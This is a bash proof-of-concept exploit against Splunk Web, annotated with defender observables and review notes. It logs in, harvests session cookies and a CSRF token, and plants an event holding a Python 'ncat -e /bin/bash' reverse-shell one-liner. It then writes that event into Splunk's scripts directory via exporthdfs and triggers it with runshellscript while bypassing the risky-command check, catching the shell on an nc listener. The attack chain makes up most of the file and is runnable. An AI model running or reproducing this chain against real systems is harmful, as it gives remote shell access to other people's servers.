#!/bin/bash
# @(#) s1
#
# Proof-of-concept against a Splunk instance. Flow as written below:
#   1. (optionally) plant a crafted event via ./spooforward.py whose raw text is a
#      python one-liner running `ncat -e /bin/bash <lhost> <lport>`, tagged with $marker;
#   2. log into Splunk Web, harvest the cookies, the CSRF token and the session cookie;
#   3. submit a search `search <marker> host=".." | exporthdfs ... dst=file:///opt/splunk/bin/scripts/pentest`
#      so the planted event is written to disk inside Splunk's scripts directory;
#   4. start a local `nc` listener and submit `| runshellscript shell_<i>_0.hdfs ...`
#      for i in 0..5, guessing the exported filename, then foreground the listener.
#
# Requires: curl, nc, and ./spooforward.py in the current directory (not on this page).
#
# Defender notes — observables this script leaves on the Splunk side:
#   - POST /en-US/account/login with the fixed cval=1479575274 and the cookie
#     names/values hardcoded on the curl line further down;
#   - search jobs on /en-US/splunkd/__raw/servicesNS/<user>/search/search/jobs whose
#     search string contains the marker (default B44D3V3NT), host="..",
#     `exporthdfs basefilename="shell" dst=file:///opt/splunk/bin/scripts/pentest`
#     or `| runshellscript shell_<n>_0.hdfs`, all sent with check_risky_command=false;
#   - an indexed event in `main` beginning with "#!/usr/bin/python" and containing
#     "ncat -e /bin/bash";
#   - an outbound TCP connection from the Splunk host to lhost:lport.
#   Splunk's search audit logging (the _audit index) records search strings and the
#   submitting user — confirm retention/coverage on the deployment in question.
#
#settings
rhost="127.0.0.1"   # target Splunk Web host
rport="8000"        # target Splunk Web port
lhost="127.0.0.1"   # address the planted payload calls back to
lport="4444"        # port the payload calls back to; nc listens on it below
proto="http"        # http or https; https makes curl skip certificate validation (--insecure)
uname="user" # change this
passw="testpass" # change this
marker="B44D3V3NT" # string used to search for payload event in splunk
# curl TLS option: no certificate verification at all when proto is https
if [[ "$proto" == "https" ]]
then
ssl="--insecure"
else
ssl=""
fi
scanhost=""     # "-c" is passed through to spooforward.py when -c is given
spoofhost="YES" # run the spooforward.py step (see note on the getopts loop)
# Command-line overrides for the settings above.
# NOTE(review): the option string lists only h p l s o m c e, so the u) and w) arms
# are never reached, and e) assigns `spoof` while the check below reads `spoofhost`.
# As written, uname/passw always come from the settings block and the spoofing
# step always runs. Documented only; code left as found.
while getopts h:p:l:s:o:m:ce option
do
case "${option}"
in
h) rhost=${OPTARG};;
p) rport=${OPTARG};;
l) lhost=${OPTARG};;
s) lport=${OPTARG};;
o) proto=${OPTARG};;
m) marker=${OPTARG};;
u) uname=${OPTARG};;
w) passw=${OPTARG};;
c) scanhost="-c";;
e) spoof="NO";;
esac
done
# spoofing a path traversal event through open indexer (see spooforward.py)
# you may want to replace payload (maxlen == 255)
# The -m text becomes the raw event: a python script calling ncat back to
# lhost:lport, with the marker in a trailing comment so the search below finds it.
# The meaning of -d/-r/-l/-i/-t/-s is defined by spooforward.py (not on this page);
# presumably -i main selects the index and -l .. sets the host field matched by
# host=".." in the exporthdfs search — confirm against spooforward.py.
if [[ "$spoofhost" == "YES" ]]
then
./spooforward.py ${scanhost} -d -r ${rhost} -l .. -i main -t . -s . -m "#!/usr/bin/python
import os;os.system('ncat -e /bin/bash ${lhost} ${lport}');# ${marker} "
fi
#get cookie
# Logs in with uname/passw in the POST body (both therefore appear in this host's
# process list and shell history) and collects every Set-Cookie value curl prints
# with -v on stderr (hence 2>&1), space-joined into one string. The cval and the
# cookie values on this line are fixed constants, not derived from the target.
cookie=$(curl ${ssl} -v -b 'cval=1479575274; splunkweb_uid=5D9DD94C-283A-4A2A-86E4-4E5C5AAF4C57; session_id_8000=4b1936d83bf88c5fe3e06409a5c5c751e51aa1f4' -d "cval=1479575274&username=${uname}&password=${passw}&set_has_logged_in=false" "${proto}://${rhost}:${rport}/en-US/account/login" 2>&1 | grep Set-Cookie | awk '{print $3}' | tr '\n' ' ')
#get csrf
# CSRF token = 4th '='-separated field of the cookie string, trailing ';' removed
# (presumably the value of Splunk's csrf-token cookie; depends on cookie order — confirm).
csrf=$( echo $cookie | tr "=" " " | awk '{print $4}' | tr -d ';')
#get sessionid
# Loads /en-US/app/launcher with the login cookies and keeps the Set-Cookie value
# it returns (the session cookie). NOTE(review): this single -H embeds
# "X-Requested-With: XMLHttpRequest" inside the X-Splunk-Form-Key header value
# instead of sending a second header; the requests below send them separately.
sid=$( curl ${ssl} -v -H "X-Splunk-Form-Key: ${csrf}; X-Requested-With: XMLHttpRequest" -b "${cookie}" "${proto}://${rhost}:${rport}/en-US/app/launcher" 2>&1 | grep Set-Cookie | awk '{print $3}' )
#export hdfs to file
# Search job (URL-decoded):
#   search <marker> host=".." | exporthdfs basefilename="shell" dst=file:///opt/splunk/bin/scripts/pentest compress=0
# i.e. the planted event is written to disk under Splunk's scripts directory.
# check_risky_command=false suppresses the risky-command confirmation. The job
# output is discarded (>/dev/null), so the exported filename is never read back.
curl ${ssl} -s -H "X-Splunk-Form-Key: ${csrf}" -H "X-Requested-With: XMLHttpRequest" -b "${sid} ${cookie}" -d "rf=*&auto_cancel=30&status_buckets=300&output_mode=json&custom.search=${marker}+host%3D%22..%22+%7C+exporthdfs+basefilename%3D%22shell%22+dst%3Dfile%3A%2F%2F%2Fopt%2Fsplunk%2Fbin%2Fscripts%2Fpentest+compress%3D0&search=search+${marker}+host%3D%22..%22+%7C+exporthdfs+basefilename%3D%22shell%22+dst%3Dfile%3A%2F%2F%2Fopt%2Fsplunk%2Fbin%2Fscripts%2Fpentest+compress%3D0&earliest_time=&latest_time=&ui_dispatch_app=search&preview=1&adhoc_search_level=smart&indexedRealtime=&sample_ratio=1&check_risky_command=false&provenance=UI%3ASearch" "${proto}://${rhost}:${rport}/en-US/splunkd/__raw/servicesNS/${uname}/search/search/jobs" >/dev/null
# fixed delay, presumably to let the export job finish before it is invoked
sleep 2
# job control on, so the backgrounded listener can be reattached with `fg`
set -m
# SMALL PAYLOAD BRUTE
echo -e "[PWN] \033[31mWaiting for shell...\033[0m"
# local listener for the callback, left in the background while the jobs are sent
nc -lvp${lport} & sleep 1
# Guesses the exported filename shell_<i>_0.hdfs for i = 0..5 and submits
#   | runshellscript shell_<i>_0.hdfs x x x x x x x x x x   (ten dummy arguments)
# as a new search job each time, again with check_risky_command=false.
for i in {0..5}
do
curl ${ssl} -s -H "X-Splunk-Form-Key: $csrf" -H "X-Requested-With: XMLHttpRequest" -b "${sid} ${cookie}" -d "rf=*&auto_cancel=30&status_buckets=300&output_mode=json&custom.display.page.search.mode=smart&custom.dispatch.sample_ratio=1&custom.display.general.type=statistics&custom.search=%7C+runshellscript+shell_${i}_0.hdfs+x+x+x+x+x+x+x+x+x+x+&custom.dispatch.earliest_time=&custom.dispatch.latest_time=&search=%7C+runshellscript+shell_${i}_0.hdfs+x+x+x+x+x+x+x+x+x+x+&earliest_time=&latest_time=&ui_dispatch_app=search&preview=1&adhoc_search_level=smart&indexedRealtime=&sample_ratio=1&check_risky_command=false&provenance=UI%3ASearch" "${proto}://${rhost}:${rport}/en-US/splunkd/__raw/servicesNS/${uname}/search/search/jobs" >/dev/null
done
# reattach the nc listener; the script blocks here until that session ends
fg